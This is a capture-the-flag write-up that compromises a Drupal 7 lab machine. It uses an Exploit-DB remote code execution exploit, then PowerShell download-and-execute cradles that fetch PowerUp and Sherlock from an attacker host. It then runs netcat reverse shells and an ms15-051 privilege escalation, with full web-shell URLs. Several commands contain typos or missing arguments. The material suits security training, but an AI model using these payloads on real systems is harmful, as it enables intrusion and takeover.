Difficulty: Medium Machine Creator: ch4p Tools Used:
NMAP Droopescan Searchsploit PHP Burp Suite Remote Code Execution Powershell Empire: Powerup.ps1 Sherlock Netcat
Task: To find User.txt and Root.txt
Let’s start with an NMAP scan.
nmap -sV -sC 10.10.10.9
HTTP – Drupal
For Drupal we can use a tool called droopescan. We can install using python pip installer.
Apt-get install python-pip pip install droopsescan
Now we can run droopescan against the remote server. This will take a while to finish.
droopescan scan drupal -u http://10.10.10.9
We know this is a drupal7 server lets use searchsploit to see if there are any vulnerabilities that we may be able to use.
Lets copy the exploit to our working directory.
cp /usr/share/exploitdb/exploits/php/webapps/41564.php .
We need to manually edit this exploit which is written in PHP. First install php-curl
apt-get install php-curl
Let’s setup port forwarding. We will direct everything pointing to localhost:1337 to 10.10.10.9:80
Now setup the request handling.
Now we need to update our exploit to route through the proxy.
Remote Code Execution
We can find vulnerabilities using powerup from powershell empire. Let’s download Powershell Empire.
Now that we have PSE downloaded lets copy the PowerUp.ps1 so we can edit it.
cp Empire/data/module_source/privesc/PowerUp.ps1 .
Now we need to pull the PowerUp.ps1 from our web server and execute on the remote machine.
In the webshell we can add this command.
http://10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.11:8000/PowerUp.ps1’) | powershell -noprofile –
Looking at the results we can see access denied which tells us that we don’t have admin rights.
Going through the results there is nothing that can help us elevate our permissions.
Let’s try finding a vulnerability using sherlock.ps1
We can copy and execute sherlock the same way that we did powerup.
10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.11:8000/Sherlock.ps1’) | powershell -noprofile –
Reverse Shell Netcat
Before we do our privledge elevation we need a remote shell we can do this with netcat x64 verison.
Unzip the netcat files so we can upload and run them.
Setup our netcat listener.
nc -lvnp 8081
Make sure the python simplehttp server is running
Python -m SimpleHTTPserver
Enter the follow url in the browser to upload netcat x64 and create a reverse shell.
http://10.10.10.9/exploit.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.11 8081
Similiar to the previous netcat we did were going to execute the existing nc file and create a 2nd reverse shell running as system.
nc -lvnp 8082
10.10.10.9/exploit.php?fupload=ms15-051×64.exe&fexec=ms15-051×64.exe “nc -e 10.10.14.11 8082”
User.txt and Root.txt